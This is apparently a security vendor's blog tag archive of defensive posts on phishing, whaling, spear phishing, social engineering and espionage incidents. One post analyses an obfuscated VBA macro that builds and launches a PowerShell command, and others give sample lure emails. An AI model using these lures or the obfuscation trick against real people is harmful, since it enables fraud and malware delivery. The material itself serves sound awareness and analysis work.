Tag Archives: phishing

What is a Whaling Attack?

What is a Whaling Attack?

A whaling attack is essentially a spear-phishing attack but the targets are bigger – hence whale phishing. Where spear-phishing attacks may target any individual, whaling attacks are more specific in what type of person they target: focusing on one specific high level executive or influencer vs a broader group of potential victims.

Cybercriminals use whaling attacks to impersonate senior management in an organization, such as the CEO, CFO, or other executives, hoping to leverage their authority to gain access to sensitive data or money. They use the intelligence they find on the internet (and often social media) to trick employees – or another whale – into replying with financial or personal data.

These attackers want to use the authority and influence of the whale to convince people not to look at or question the fraudulent request. When employees don’t look too hard at the email address or websites and just follow directions, cybercriminals can make out like bandits.

Whaling Attack Statistics

The FBI reported that companies lost nearly $215 million in 2014 as a result of phishing attacks. In 2016, the Verizon DBIR reported 61 phishing attacks targeting finance teams. That number rose to 170 in 2017 – nearly a 200% increase!

whaling attack statistic

How do Whaling Attacks Work and Why Are They Successful?

Whaling attacks demand more research and planning than standard phishing and spear-phishing attacks. To impersonate a high-value target, they need to take the time to figure out the best way to sound like their target, find a way to approach their target, and figure out what kind of information they can get from the victims.

Cybercriminals look at social media and public company information to establish a profile and plan of attack. They can also use malware and rootkits to infiltrate the network: an email that comes from the CEO’s account is much more effective than a spoofed email account. And when these emails include details to make the attacks seem like they’re coming from trusted entities? Even better.

Emails are by far the most effective phishing (including whaling) method: 98% of all phishing attacks use email. In the past, phishing emails focused on including links or attachments with malware; more recently, successful whaling attacks have made a single request that seems plausible to the target.

Whaling Attack Examples

In 2016, an employee at Snapchat disclosed all of the company’s payroll data to a scammer – the employee had responded to an email that looked to be from the CEO and responded promptly. HR and payroll teams are frequent targets of whaling attacks because they have access to sensitive personal data.

In another whaling attack, an employee at a commodities firm wired $17.2 million in several installments to a bank in China, as requested by what looked to be emails from the CEO. The company was planning to expand their business into China at the time, so the request seemed plausible enough.

In both of those incidents, the victim failed to identify the whaling attack or ask questions to validate the request. It’s critical to train executives and staff to be vigilant and on alert for any phishing scams.

Tips for Avoiding a Whaling Attack

Avoiding a whaling attack uses the same tactics as avoiding a standard phishing attack. The only difference is the high value of the target.

5 tips for avoiding a whaling attack in list form

  • Educate employees about whaling attacks and how to identify phishing emails.
    • Train employees and executives to think with a security mindset and ask questions.
    • Check reply-to email address and validate that it’s legitimate.
    • Call to confirm unusual or urgent requests.
  • Flag all emails that come from outside of the organization – this helps highlight potential scam emails.
  • Discuss use of social media with the executive team as it relates to whale phishing.
    • Social media is a goldmine of information cybercriminals can use in their whale phishing scams.
    • Security experts recommend that members of the executive teams enable privacy restrictions on their personal social media accounts to reduce exposure of information that can be used in a social engineering scam.
  • Establish a multi-step verification process for internal and external requests for sensitive data or wire transfers.
  • Exercise data protection and data security policies: Monitor file and email activity to track and alert on suspicious behavior, and implement layered security to protect your company against whale – and any kind – of phishing.

Want to learn more? Find out how Varonis can help you prevent and defend against whaling attacks – and protect your data and your money from being stolen.

What is Spear Phishing?

spear phishing hero

According to the 2018 Verizon Data Breach Report, phishing and pretexting are the two favorite tactics employed in social engineering attacks, used in 98% and 93% of data breaches respectively. And last year, the IRS noted a 400% surge in spear phishing against CEOs.

What is Spear Phishing?

Spear phishing is a targeted attack where an attacker creates a fake narrative or impersonates a trusted person, in order steal credentials or information that they can then use to infiltrate your networks. It’s often an email to a targeted individual or group that appears to come from a trusted or known source.

Spear Phishing vs. Phishing

Spear phishing is a subset of phishing attacks. The end goals are the same: steal information to infiltrate your network and either steal data or plant malware, however the tactics employed by the two are different.

Phishing attacks cast a wide net: phishers are throwing hunks of bread into a lake, and they don’t care what kind of fish they catch – as long as you take the bait, they can get into the network. They’re not personalized attacks: they’re typically distributed to a wide group of people at a time, using something that looks vaguely legitimate in hopes that enough people will click on their link so that they can get more information or install malware.

Spear Phishing, on the other hand, targets a specific individual or group. They lure their victims with information that makes it seem like they’re a trusted or familiar source, with as much personal information as possible to make their approach look legitimate.

spear phishing definition

Spear Phishing Examples

The Russian cyber espionage group Fancy Bear allegedly committed one of the more famous spear phishing campaigns: using spear phishing techniques to infiltrate the Democratic National Convention to steal emails. They first obtained an updated contact list and then targeted high-level party officials, which lead them to Podesta’s Gmail account. They stole 50,000 emails in one day, and the rest is recent history.

Fancy Bear also allegedly used spear phishing to infiltrate Bundestag, part of the German Parliament, and Emmanuel Macron’s campaign in the French election.

Spear phishing is one of the more reliable social engineering methods employed by blackhats – which is what makes the defense against spear phishing both important and challenging.

Tips for Avoiding a Spear Phishing Attack

  • Be skeptical: If you want to avoid being scammed you have to ask questions – both to the potential scammer and to yourself. As a general rule, don’t immediately comply with the first request you get. Ask a question, “why do you need that?” “What are you going to do with this data?” “No, I won’t buy you a Walmart gift card.”
  • Be aware of your online presence: Spear phishers depend on a certain amount of familiarity with their target. The more information you share with the public, the more ammunition a spear phisher has to convince you to give them something.
  • Inspect the link: Visually inspect the links in your emails by hovering over them. Scammers are pretty good at masking URLs or making them look similar enough to trick our human brains into thinking they are ok. If a domain looks like it’s overpromising, it probably isn’t legitimate.
  • Don’t click the link: Instead of clicking a link in the email, use your browser and manually navigate to the destination. Avoiding a link sent in a spear phisher’s email should guarantee that you aren’t going to a malicious website. Make it a habit of going to the websites you trust instead of clicking a link, use https as much as possible, and use your bookmarks to keep track of your known good web destinations.
  • Be smart with your passwords: We all know a modern computer can easily crack a short password. You should be using passphrases that are at least 16 alphanumeric characters long: write it down, or use a password manager service. Change passwords regularly, and practice basic internet security to keep your data safe.
  • Keep your software updated: Security researchers and malware distributors are in an arms race, and we are caught in the middle. Security researchers do their best to update their Anti-virus and security software to match the most recent known attacks and patch vulnerabilities. Malware distributors are doing their best to find the next best hack, application, or vulnerability they can use to steal your data. As consumers, it’s important to stay up to date: patch vulnerabilities, and update security settings and software.
  • Implement a company-wide data security strategy: If 1 out of every 100 spear phishing attempts is successful, it’s more than likely that some of your data will be compromised. One compromised users can lead to lateral movement, privilege escalation, data exfiltration, and more. Implement a layered security technique to protect against spear phishing on an enterprise level – and never underestimate the value of educating employees with security awareness training.

tips for avoiding a spear phishing attack

There are many ways to enhance your data security strategy to defend your users from phishing and spear phishing attacks. You can configure strict SPF rules to check and validate who is sending the emails. Implement a Data Security Platform to protect and monitor your data, and leverage security analytics to alert your team of suspicious behavior.

Want to learn more? Find out how Varonis can help prevent and defend against spear phishing attacks – and protect your data from being compromised or stolen.


The Anatomy of a Phishing Email

Recognize a phishing scam

Have you been hooked by a phishing email?

Phishing scams are one of the most common ways hackers gain access to sensitive or confidential information. In fact, according to the Verizon’s 2018 Data Breach Investigations Report, phishing is involved in 70 percent of breaches that feature a social engineering component.

What is Phishing?

At the most basic level, a phishing scam involves sending fraudulent emails that appear to be from a reputable company, with the goal of deceiving recipients into either clicking on a malicious link or downloading an infected attachment, usually to steal financial or confidential information.

If your employees don’t know the signs of a phishing email, your company is at risk. According to Verizon, the average time it took for the first victim of a large-scale phishing campaign to click on a malicious email was 16 minutes; however, it took twice as long — 33 minutes — for a user to report the phishing campaign to IT.

Given that 49 percent of malware is installed via email, these 17 minutes could spell disaster for your company.

How to Spot a Phishing Scam

We’ve broken out the most common components of a phishing email. Check out our full infographic to test your knowledge.

how to spot a phishing scam

How many did you get? Read on to learn more about the identifying characteristics of a typical phishing email.

scare tactics phishing

Subject line
Phishing campaigns typically aim to create a sense of urgency using intense language and scare tactics, starting with the email’s subject line. Common themes among phishing emails are that something sensitive, such as a credit card number or an account, has been compromised. This is done to induce the recipient into responding quickly, without recognizing the signs of a scam.

“From” field
To work, phishing campaigns must trick the email recipient into believing that the message is from a reputable company. As such, the email will appear to come from a legitimate entity within a recognized company, such as customer support. Upon closer look, however, you can see that both the name of the sender and the sender’s email address is a spoof on a known brand, not a real vendor.

phishing email body copy

“To” field
Phishing emails are often impersonal, addressing the recipient as a “user” or “customer.” This is a red flag; while businesses may send out mass eblasts announcing a sale or service, legitimate companies will address you by name when asking for an update to financial information, or dealing with a similarly sensitive matter.

Body copy
As with the subject line, the body copy of a phishing email is typically employs urgent language designed to encourage the reader to act without thinking. Phishing emails are also often riddled with both grammar and punctuation mistakes.

phishing scam malicious link

Malicious link
A suspicious link is one of the main giveaways of a phishing email. These links are often shortened (through bit.ly or a similar service) or, as above, are formatted to look like a legitimate link that corresponds with the company and message of the fake email. However, rolling over the link shows a malicious address that doesn’t take you to the stated web address.

Scare tactics
In addition to urgent language, phishing emails often employ scare tactics in hopes that readers will click malicious links out of alarm or confusion. Such messaging is often framed around updates that are immediately required or payments that must be made within a certain amount of time.

phishing scam footer

Email sign-off
As with the email’s greeting, the sign-off is often impersonal — typically a generic customer service title, rather than a person’s name and corresponding contact information.

A phishing email’s footer often includes tell-tale signs of a fake, including an incorrect copyright date or a location that doesn’t correspond with that of the company.

malicious attachment

In addition to malicious links, phishing scams often include malicious downloadable files, often compressed .zip files, which can infect your computer.

malicious landing page

Malicious landing page
If you do click on a phishing link, you’ll often be taken to a malicious landing page, much like the one above. There are several ways to spot a malicious landing page:

  • Website address: The web address of a malicious landing page attempts to mimic the web address of a legitimate company, but errors such as misspellings and unsecure connections denote an unsafe website.
  • Missing navigation and footer: The goal of a malicious landing site is to take your information. As such, these pages are often bare-bones. Here, you can see that the landing page is missing both the header and footer of Apple’s ID sign-in page.
  • Misspelling: Like in the phishing email, the malicious landing page will attempt to mimic a real company, but small oversights can tip you off: like above, where “Apple Pay” is misspelled as one word.
  • Information collection: The goal of phishing scams is to get you to enter personal or financial information, so malicious landing pages will almost always include some type of information collection form that deviates slightly from the company’s legitimate landing page. In the malicious page above, users are required to enter their Apple ID password; this is not required on the actual Apple ID login page.

So, were you able to spot all the errors? As phishing attacks become more common — and phishing tactics more sophisticated — it’s important to inspect all unsolicited emails with a careful eye.

Email recipients don’t shoulder all the burden, however. To truly combat phishing tactics, companies must become more vigilant, through both employee training and the use of security software, to better spot and prevent potentially debilitating attacks.

Adventures in Fileless Malware, Part III: Obfuscated VBA Scripts for Fun an...

Adventures in Fileless Malware, Part III: Obfuscated VBA Scripts for Fun and Profit

After yakking in the last two posts about malware-free or fileless attack techniques, we’re ready to handle a dangerous specimen. The Hybrid Analysis site is the resource I rely on to find these malware critters. While the information that HA provides for each sample —system calls, internet traffic, etc. — should be enough to satisfy a typical IT security pro, there is some value in diving into one of these heavily obfuscated samples to see what’s actually going on.

If you’re playing along at home, I suggest doing this in a sandbox, such as AWS, or if you’re working on your own laptop, just make sure to comment out the system calls that launch PowerShell.

Into the Obfuscated VBA Muck

The malware I eventually found in Hybrid Analysis is a VBA script that was embedded in a Word doc. As I mentioned last time, to see the actual script, you’ll need Frank Boldewin’s OfficeMalScanner.

After extracting the script, which I gave you a peek at in the last post, I decided to load the thing into the MS Word macro library. And then — gasp  —  stepped through it using the built-in debugger.

My goal was to better understand the obfuscations: to play forensic analyst and experience the frustrations involved in this job.

If you’re going into one of these obfuscated scripts for the first time in a debugger, you’ll likely be gulping espressos as you make your way through the mind numbing complex code and watch blankly as you look at the variable L_JEK being assigned the string “77767E6C797A6F6”.

It’s that much fun.

What I learned with this obfuscated VBA script is that only a very small part of it does any of the real work. Most of the rest is there to throw you off trail.

Since we’re getting into the nitty-gritty, I took a screen shot of the teeny part of the code that performs the true evil work of setting up the PowerShell command line that is ultimately launched by the VBA macro.

Tricky: just take the hex value and subtract 7 for the real ascii.

It’s very simple. The VBA code maintains a hex representation of the command line in a few variables and then translates it to a character string. The only “tricky” part is that hex values have been offset by 7.

So for example, the first part of the hex string comes from L_JEK (above). If you take 77 and subtract 7, you’ll get a hex 70. Do the same for 76 and you have obtain hex 6F. Look these up in any ascii table, and you’ll see it maps to the first two letter of “powershell”.

This ain’t a very clever obfuscation, but it doesn’t have to be!

All it has to accomplish is getting past virus scanners searching for obvious keywords or their ascii representations.  And this particular sample does this well enough.

Finally, after the code builds the command line, it then launches it through the CreateProcess function (below).

Either comment out system calls or set a breakpoint before it.

Think about it. A Word doc was sent in a phish mail to an employee. When the doc is opened, this VBA script  automatically launches a PowerShell session to start the next phase of the attack. No binaries involved, and the heavily obfuscated scripts will evade scanners.


To further my own education, I pulled out another macro from Hybrid Analytics (below) just to see what else is out there. This second one effectively does the same thing as the code above.

Secret code embedded in VBA.

It’s a little more clever in how it builds the command line. There’s a decode function, called “d”, that filters out characters from a base string by comparing against a secondary string.

It’s a high-school level idea, but it gets the job done: it will evade scanners and fool IT folks who are quickly looking at any logs for unusual activities.

Next Stop

In my first series of post on obfuscation, I showed that Windows Event logging captures enough details of PowerShell sessions — that is, if you enable the appropriate modules — to do a deep analysis after the fact.

Of course, the brilliance of fileless attacks is that it’s hard to determine whether a PowerShell script at run-time is doing anything evil through a basic parsing of the command line by scanning event logs.


PowerShell sessions are being launched all the time, and one hacker’s PowerShell poison can be close to another IT admin’s PowerShell power tool. So if you want to alert every time a script downloads something from the Internet, you’ll be sending out too many false positives.

Of course, this leads to this blog’s favorite topic: the failure of perimeter defenses to stop phishing and FUD malware, and the power of User Behavior Analytics.

In short: it’s a losing battle trying to stop hackers from getting past perimeter defenses. The better strategy is to spot unusual file access and application behaviors, and then respond by de-activating accounts or taking another breach response measure.

That’s enough preaching for the day. In the next post, we’ll take a closer look at more advanced types of fileless attacks.

Continue reading the next post in "Fileless Malware"

I Click Therefore I Exist: Disturbing Research On Phishing

I Click Therefore I Exist: Disturbing Research On Phishing

Homo sapiens click on links in clunky, non-personalized phish mails. They just do. We’ve seen research suggesting a small percentage are simply wired to click during their online interactions. Until recently, the “why” behind most people’s clicking behaviors remained something of a mystery. We now have more of an answer to this question based on findings from German academics. Warning:  IT security people will not find their conclusions very comforting.

Attention Marketers: High Click-Through Rates!

According to research by Zinaida Benenson and her colleagues, the reasons for clicking on phish bait are based on an overall curiosity factor, and then secondarily, on content that connects in some way to the victim.

The research group used the following email template in the experiment, and sent it to over 1200 students at two different universities:


The New Year’s Eve party was awesome! Here are the pictures:

http://<IP address>/photocloud/page.php?h=<participant ID>

But please don’t share them with people who have not been there!

See you next time!

<sender’s first name>

The message, by the way, was blasted out during the first week of January.

Anybody want to guess what was the overall click-through rate for this spammy message?

A blazing 25%.

Marketers everywhere are officially jealous of this awesome metric.

Anyway, the German researchers followed up with survey questions to find the motivations behind these click-aholics.

Of those who responded to the survey, 34% said they were curious about the party pictures linked to in the mail, another 27% said the message fits the time of year, and another 16% said they thought they knew the sender based on just the first name.

To paraphrase one of those cat memes, “Humans is EZ to fool!”

The clever German researchers conducted a classic cover-story design in their experiment. They enlisted students to ostensibly participate in a study on Internet habits and offered online shopping vouchers as an incentive. Nothing was mentioned about phish mails being sent to them.

And yes, after the real study on phishing was completed, the student subjects were told the reason for the research, the results, and given a good stern warning about not clicking on silly phish mail links.

Benenson also gave a talk on her research at last year’s Black Hat. It’s well-worth your time.

Phishing: The Ugly Truth

At the IOS blog, we’ve also been writing about phishing and have been following the relevant research. In short: we can’t say we’re surprised by the findings of the German team, especially as it relates to clicking on links to pictures.

The German study seems to confirm our own intuitions: people at corporate at jobs are bored and are finding cheap thrills by gazing into the private lives of strangers.

Ok, you can’t change human nature, etc.

But there’s another more disturbing conclusion related to the general context of the message.The study strongly suggests the more you know and can say about the target in the phish mail, the more likely it is that they will click. And in fact in an earlier study by Benenson, a 56% click-rate was achieved when the phish mail recipient was addressed by name.

Here’s what they had to say about their latest research:

 … fitting the content and the context of the message to the current life situation of a person plays an important role. Many people did not click because they learned to avoid messages from unknown senders, or with an unexpected content  … For some participants, however, the same heuristic (‘does this message fit my current situation?’) led to the clicks, as they thought that the message might be from a person from their New Year’s Eve party, or that they might know the sender.


Implications for Data Security

At Varonis, we’ve been preaching the message that you can’t expect perimeter security to be your last line of defense. Phishing, of course, is one of the major reasons why hackers find it so easy to get inside the corporate intranet.

But hackers are getting smarter all the time, collecting more details about their phishing targets to make the lure more attractive.The German research shows that even poorly personalized content is very effective.

So imagine what happens if they gain actual personal preference and other informational details from observing victims on social media sites or, perhaps, through a previous hack of another web site you engage with.

Maybe a smart hacker who’s been stalking me might send this fiendish email to my Varonis account:

Hey Andy,

Sorry I didn’t see you Black Hat this year! I ran into your colleague Cindy Ng, and she said you’d really be interested in research I’m doing on phishing and user behavior analytics. Click on this link and let me know what you think.  Hope things are going well at Varonis!


Bob Simpson, CEO of Phishing Analytics

Hmmm, you know I could fall for something like this the next time I’m in a vulnerable state.

The takeaway lesson for IT is that they need a secondary security defense, one that monitors hackers when they’re behind the firewall and can detect unusual behaviors by analyzing file system activity.

Want to find out more, click here!

Did you click? Good, that link doesn’t point to a Varonis domain!

Another conclusion of the study is that your organization should also undertake security training, especially for non-tech savvy staff.

We approve as well: it’s a worthwhile investment!

Cyber Espionage: Could Russian and Korean Hackers Have Been Stopped (With U...

Cyber Espionage: Could Russian and Korean Hackers Have Been Stopped (With UBA)?

Once upon a time, breaking into the Democratic National Committee required non-virtual thieves picking real door locks and going through file cabinets. And stealing the design secrets of a fighter jet was considered a “black bag” job that utilized the talents of a spy who knew how to work a tiny spy camera. Then, the stealthy spy could pass the micro-film to a courier by exchanging identical brief cases.

Times have changed.

In the last few days, two stories have shown us, if we still needed more evidence, how modern espionage has evolved into hacking. Cyber spies can conduct first-class intelligence operations without leaving their desks at the IT departments of their Dr. Evil-ish security agencies.

Spies Like Us

Yesterday, The Washington Post said that Russian government hackers had penetrated the DNC’s computer network.

According to security experts who were brought in by the DNC, the cyber spies thoroughly compromised the DNC’s computers and were able to read all email and chat traffic.

Unfortunately, this news is hardly a surprise. In fact, we predicted this would happen.

It’s believed that two separate and perhaps competing Russian hacking groups were involved, with one of them having broken into the DNC network as far back as last summer. No financial information about donors was taken. The hackers were engaging in espionage, gaining access to the DNC’s opposition research on Donald Trump.

And then on the Korean peninsula, South Korean officials said 40,000 documents related to the wing design of the US’s F-15 fighter jet had been taken by their friendly neighbors to the north.

Stealthy Attacks

We have more information about the Russian spies, so let’s look at that incident first.

One of the Russian cyber groups involved in the DNC was identified as Cozy Bear. This is the same group responsible for attacks at the White House. The second group is called Fancy Bear, and they have been known to exploit zero-day vulnerabilities.

Security experts say that both groups have also used phishing attacks in the past. Cozy Bear and Fancy Bear are believed to be connected to Russian intelligence agencies.

At this point, though, we’re not sure exactly how the gangs broke into the DNC network.

However, we do know that once in, they inserted remote access trojans (RATs) and implants that allowed them to remotely log keystrokes, execute commands, and transfer files. The Russian cyber gangs also used Command and Control (C2) techniques, which embed the commands to control the RATs in an HTTP stream.

As far as IT admins were concerned, some users at the DNC were communicating with one or more web sites, when in fact these C2 web sites were run by the cyber gangs and used to orchestrate the attack.

The Russian cyber spies also hid their actions by using PowerShell commands — malware-less hacking. And they also stole credentials with Mimikatz, which was run as a stealthy PowerShell script, in a Pass-the-Hash/Pass-the-Ticket attack.

Putting on our intelligence analyst’s hat, I think we can say with good confidence that the North Koreans used similar techniques. A phish mail, for example, involving fake Apple IDs was used to initially enter Sony in Pyongyang’s massive doxing of that company.

The current attack that was launched against Korean Air Lines began in 2014. The North Korean cyber spies likely used the aforementioned stealth techniques to keep their implants and document exfiltration activities below the radar.

Spy Lessons

If you’ve been following along, none of the above — unfortunately should be new to you. In fact, for anyone who’s been keeping track of hacking incidents over the last few years, these different techniques and tools are just familiar parts of the landscape.

We’ve known for a very long time the smart hackers get around perimeter defense using phishing, SQL-injection, or zero-day vulnerabilities. And then once in, they have many ways to remain stealthy and avoid triggering virus scanners.

Instead of trying to build a higher wall, a more practical approach is to spot the hackers when they’re inside and then prevent them from accessing and exfiltrating sensitive data.

In both the DNC and Korean Air Lines incident, the IT teams eventually noticed some anomalies. However, at that point, it was far too late in terms of preventing the surveillance of internal emails and the removal of data.

A far better solution is to automate the anomaly detection so that when files are accessed at unusual times for a given user or PowerShell executables launched by users who hardly or never run these apps, then the alarms will go off.

We are, of course, talking about User Behavior Analytics (UBA). As these incidents teach us, the protection of sensitive data is too important to be based on hunches or the blind luck of an alert IT person looking at audit trails.

Instead, UBA’s predictive algorithms can compare current access patterns against historical records in order to spot the hackers in closer to real-time.

Think of UBA as giving your IT group the power to spy on hackers and cyberspies. It’s far more efficient and cheaper than training and outfitting an agent. Sorry, 007!

Got UBA?  Learn more about how Varonis can protect you data. 

CEO Phishing: Hackers Target High-Value Data

CEO Phishing: Hackers Target High-Value Data

Humans like to click on links. Some of us are better at resisting the urge, some worse. In any case, you’d also expect that people in the higher reaches of an organization — upper-level executives and the C-suite — would be very good at resisting phish bait.

Harpooning the Whale

Alas, even the big phish like to chomp on the right links.

We now have even more evidence that cyber thieves are getting better at fine tuning their attacks against high-value targets — known as “whale phishing”.

The security firm Digitalis tells us that attackers are using social media to research executive habits–say an interest in cricket — to then forge an email (embedded with a malware payload)  from a business associate — also discovered through social media — mentioning the cricket match.

This is business-class phishing!

The attraction of the corporate whale is that they are likely to have incredibly valuable information on their laptops. Not the commodity PII that are involved in most data breaches, but intellectual property and other sensitive data – deals in progress, key customers, confidential financial data, or embarrassing emails.

It’s the kind of information that could be sold to competitors or, better yet, doxed unless a ransom is paid.

We’ve long known that phishing attacks that are based on better research are very effective. The more the attacker knows about you, the more likely you are to trust the sender.

Which would you click on: an email sent by a Nigerian finance minister regarding unclaimed funds, or an email from your bank — from your local branch — saying there’s been an adjustment to your balance, and you’ll need to look at the attached PDF?  Enough said.

Executive Privacy

Digitalis also found that executives, like the rest of us, are not very good about their privacy setting on Facebook and other social networking sites. They found that less than half of those surveyed restrict who can see their profile. And only 36% keep up with their social settings.

Should executives simply forgo social media?

I’ve heard experts say if C-levels and other execs don’t set up their own account, the hackers will do the work for them by establishing a forged identity and squatting on their property.  This can then lead to very sophisticated phishing.

My advice: as an executive, you should take charge of your social persona. This leads to one of the points of the Digitalis Research: executives (and the rest of us as well) should never reveal more than they have to in these social networks.

As in the file system world, always change from the default “everyone” setting, and restrict information to just friends.

And since social networking companies — well at least one — have had a bad habit of tweaking these settings, you should, as Digitalis suggests, periodically revisit your account.

Concierge Security?

Security pros have pointed out that social networks, by design, will always share some information by default, and this typically includes who your friends are.

Even with very restrictive settings, a smart attacker can still use this friend information to make very good guesses about the habits, interests, and preferences of the target account—say, the CFO of the company.

Welcome to our world!

There are no easy answers here when it comes to protecting executives from attacks. It’s essentially the problem organizations face with hackers in general: they will get in!

The more important point is to monitor and detect for unusual system and file events to reduce the risks.

In a past blog post, I’ve said its worth devoting IT security resources to monitoring the computer activities of corporate VIPs. With this latest research, I’ll double down on that position.

And if the company is large enough, this could include dedicated staff — perhaps a security concierge service.

In any case, it does make sense to take any alarms and notifications involving the computer accounts of C-levels very seriously. Don’t view them as likely false positives.

It’s worth tracking them all down until they’re resolved.

Social Engineering Remains a Top Cybersecurity Concern

Social Engineering Remains a Top Cybersecurity Concern

In 2016, the top cyberthreat for IT pros, at least according to ISACA’s Cybersecurity Snapshot, is social engineering.  It has always been a classic exploit amongst the hackerati. But in recent years it has become a preferred entry technique.

Instead of breaking into a network, an attacker merely has to manipulate those who have access to the victim’s data, even the victim to give away credentials – “Is your Requester Code 36472? No, it’s 62883.” This is technically a salami attack that works by fooling several people, so the attacker has enough slices of information to piece together the credentials needed to access the user’s account.

In previous blog posts, we’ve covered a few ways to help guard against social engineering. But because social engineering can’t be blocked by technology alone, humans remain the weakest link in this security problem.

“People inherently want to be helpful and therefore are easily duped,” said Kevin Mitnick, who was once the country’s most wanted computer criminal. “They assume a level of trust in order to avoid conflict.”

As IT security groups allocate their resources to defend themselves against major security threats, they shouldn’t forget to continuously educate end users on social engineering method so they don’t become easy targets to exploit.

Let’s review the most common forms of social engineering:

  1. Phishing

One of the easiest ways to become infected with malware –Ransomware anyone? – is through phishing. With a phishing attack, the bait is an email containing personal information hackers have collected through prior reconnaissance. Crafted to look like an official communication from a legitimate source (Fedex, UPS), the phish mail is intended to catch the victims off guard, duping them to click on a link that takes them to a non-legitimate web site or opening a file attachment containing a malware payload.

Often the hackers will focus on high-value targets, bamboozling executives and other C-levels. The goal in “whale phishing” is usually to extract IP or other very confidential and possibly embarrassing information.

Educate your staff! Don’t click on links or open attachments or emails from people you don’t know or companies you don’t do business with.

Related Phishing Blog Posts:

  1. Pretexting aka Impersonation

Pretexting is really a more direct instance of phishing that relies on old-fashioned person-to-person interactions. Typically, a phone call is involved.  Fun fact: Hannibal Lecter knew how to  pretext!

While Anthony Hopkins may have impersonated a temporary employee from his jail cell, real-life pretexters can impersonate a fellow employee, IT representative, or vendor. Their goal is to gather confidential or other sensitive information –  SSN, bank account, mother’s maiden name, or the size of your savings and investment accounts. Today, attackers are also outsourcing the pretexting work to companies that will make the calls for them. Talk about progress!

Pretexting  had become such a problem that in 1999 the  Gramm-Leach-Bliley Act (GLBA), better known for improving financial data security, flat out made pretexting illegal.

The statute applies to all organizations that handle financial data, including banks, brokerages, credit unions, income tax preparers, debt collection agencies, real estate firms and credit reporting agencies. Take that Hannibal Lecter.

However, GLBA has not stopped a new generation of pretexters from selling the data they’ve collected to data brokers, who may then resell it to private investigators or even insurance companies.

  1. Baiting

Baiting is like a phishing, but the attacker dangles and entices the victim with an exciting offer. It could be in the form of a free download – music, movie, book — or a USB flash drive with a logo labeled, “Confidential Company Roadmap”.

Once the victim’s curiosity or greed leads to a download or use of  a device, the victim’s computer gets inflected with malware, enabling the attacker to infiltrate the network.

  1. Quid Pro Quo (This for That)

Similar to baiting,  a Quid Pro Quo also lures but with a practical benefit – usually a service – such as “Please help me with my computer!” Instead of fixing the problem, the attacker installs malware on the victim’s computer.

  1. Piggybacking (or Tailgating)

Piggybacking happens in the non-virtual world, involving a person tagging along with a legitimate employee who is authorized to enter a restricted area.

Solution?  Implement one of the most basic security tips: set your PC to lock after inactivity!


Want to guard against social engineering? Make sure least privilege is in its authorization processes.




Image source: ISAC’s January 2016 Cybersecurity Snapshot, Global Data

Phishing Attacks Classified: Big Phish vs. Little Phishes

Phishing Attacks Classified: Big Phish vs. Little Phishes

The CMU CERT team I referred to in my last post also has some interesting analysis on the actual mechanics of these phishing attacks. Based on reviewing their incident database, the CERT team was able to categorize phishing attacks into two broader types: single- versus multi-stage.

What’s the difference? Think of single-stage as catching lots of small phish, and multi-stage as landing the big one.

Single-Stage Attacks: Mass Marketing

In a single-stage attack, the hacker is interested in collecting information on a specific user.  They accomplish this through a volume approach: blasting out emails, and hoping to get some small percentage of click-throughs. It’s essentially mass marketing applied to phishing. The CMU folks have learned that response rates are roughly between 3% and 11%. So hackers probably know in advance the yields they’ll achieve from the campaigns based on their various lists.

Single-stage phishing is the one we often come across in our inbox—i.e., FedEx shipment waiting, credit card cancelled, etc. Once the bait is taken, the hackers receive personal data directly from the user, who has typically been tricked into entering details into a web form—credit card, social security numbers, passwords, etc.

Multi-Stage Attacks: The Business Class of Phishing

Multi-stage is the better planned, deadlier attack launched by more sophisticated cyber-thieves  In this case, the hackers are not interested in obtaining just basic personal data from a single user.

According to CERT, their “response and information capture” phase (see the graphic below) now has multiple parts: hackers probe the system to obtain higher privileges with the goal to find more granular data (PII, IP),  possibly learn about system internals for another attack, find additional phishing targets, or even use the data to target more high-value phish—executives.

cmu-cert -- attack

From Unintentional Insider Threats: A Review of Phishing and Malware Incidents by Economic Sector (CMU CERT)

CERT’s Advice

While the academic community continues to explore why we click on some obviously spammy stuff, the CERT team has some solid advice on mitigation:

  • Organizations need to view compliance not as an obstacle to job productivity, but as an essential part of an employee’s responsibilities.
  • IT needs to deploy more programs to train staff on identifying social engineering schemes.
  • There should be a focus on improved tools for computer and network defense cyber monitoring.

Varonis eBook explains how phishing works:  get our free Anatomy of a Phish!

Image credit: Presus museum